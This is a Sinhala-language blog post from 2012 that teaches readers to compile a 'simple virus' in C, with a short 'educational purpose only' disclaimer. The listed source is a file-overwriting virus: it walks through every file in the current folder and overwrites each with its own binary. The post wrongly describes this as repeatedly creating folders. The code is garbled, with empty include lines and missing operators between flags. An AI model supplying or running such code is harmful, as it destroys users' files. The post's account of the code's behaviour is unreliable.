Adlink

Tuesday, June 12, 2012

Simple Virus Using C





හායි කස්ටිය ගොඩ දවසකින් ඔයාලට ටෙක්නිකල් සම්බන්ද පෝස්ට් එකක් දාන්නත් බැරි උනා අද කියල දෙන්න යන්නේ කොහොමද c programing language එක භාවිතා කරලා සරල විදිහේ virus එකක් හදන්නේ කියලා,educational purpose වලට විතරක් මේක පාවිචි කරන්න.ඔයාලට ඉදිරියේදි c programing language එක ගැන පාඩම් මාලාවක් ගේන්නත් බලාපොරොත්තු වෙනවා.ඔයාලට මෙහිදි C  source code එක compile කර ගැනිමට අවශය වෙනවා.මේ සදහා ලේසිම විදිහ ලෙස dev c++ හෝ code blocks ඔයාලට යොදා ගන්න පුලුවන්.
code blocks Download කර ගන්න මෙතනින්
 නැත්නම් 
 dev c++ download කර ගන්න


ඔයාලට කරන්න තියෙන්නෙ හරිම සිම්පල් දෙයක් මම දිලා තියෙන ලින්ක් වලින් ඔයා කැමති එකක් භාවිතා කරලා අපිට අවශය කරන කොඩ් එක compile කර ගැනිමට අවශය IDE එක download කරගන්න. code blocks එක 70mb වන අටර dev c++ 13.5 mb විතර වෙනවා.
ඔබ කැමති එකක් භාගත කරගෙන installe කරන්න හරිම ලේසි.ඉන් පසු file new -->ඔනි කරන කොඩ් එක පේස්ට් කරලා save as  ගිහින් කැමති නමක් එක්ක ෆයිල් ෆොමැට් එක ලෙස  C source file යන්න තෝරන්න.
මේ ටික කිවේ C ගැන දැනුමක් නැති අය සදහා .මෙහිදි exe එකක් හැදෙන අටර එය virus  එක ලෙස ක්‍රියා කරයි එක නිසා exe එක හැදුනට පස්සේ run කරන්න එපා මොකද මෙහිදි වෙන්නේ folder එකක් තුල නැවත නැවත folder සකස් විමයි.Educational purpose only dont missuse IT
source code:



#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: FolderFllod\nProgrammer:MoulderFiles.blogspot.com\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}





2 comments:

  1. @ Ano
    ඔව් මම මේක හදලා බැලුවා.code bloks එකේ වැඩ

    ReplyDelete
  2. ඇනෝ මේක C වලින් ලියලා තියෙන්නේ

    ReplyDelete

කැමති කෙනෙක් කමෙන්ට් එකක් දාන්න අවුලක් නැ දැම්මත් නැතත් බ්ලොග් එක ලියනවා